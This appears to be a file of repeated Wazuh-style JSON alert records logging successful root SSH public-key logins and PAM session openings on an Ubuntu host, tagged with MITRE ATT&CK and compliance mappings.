-{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} 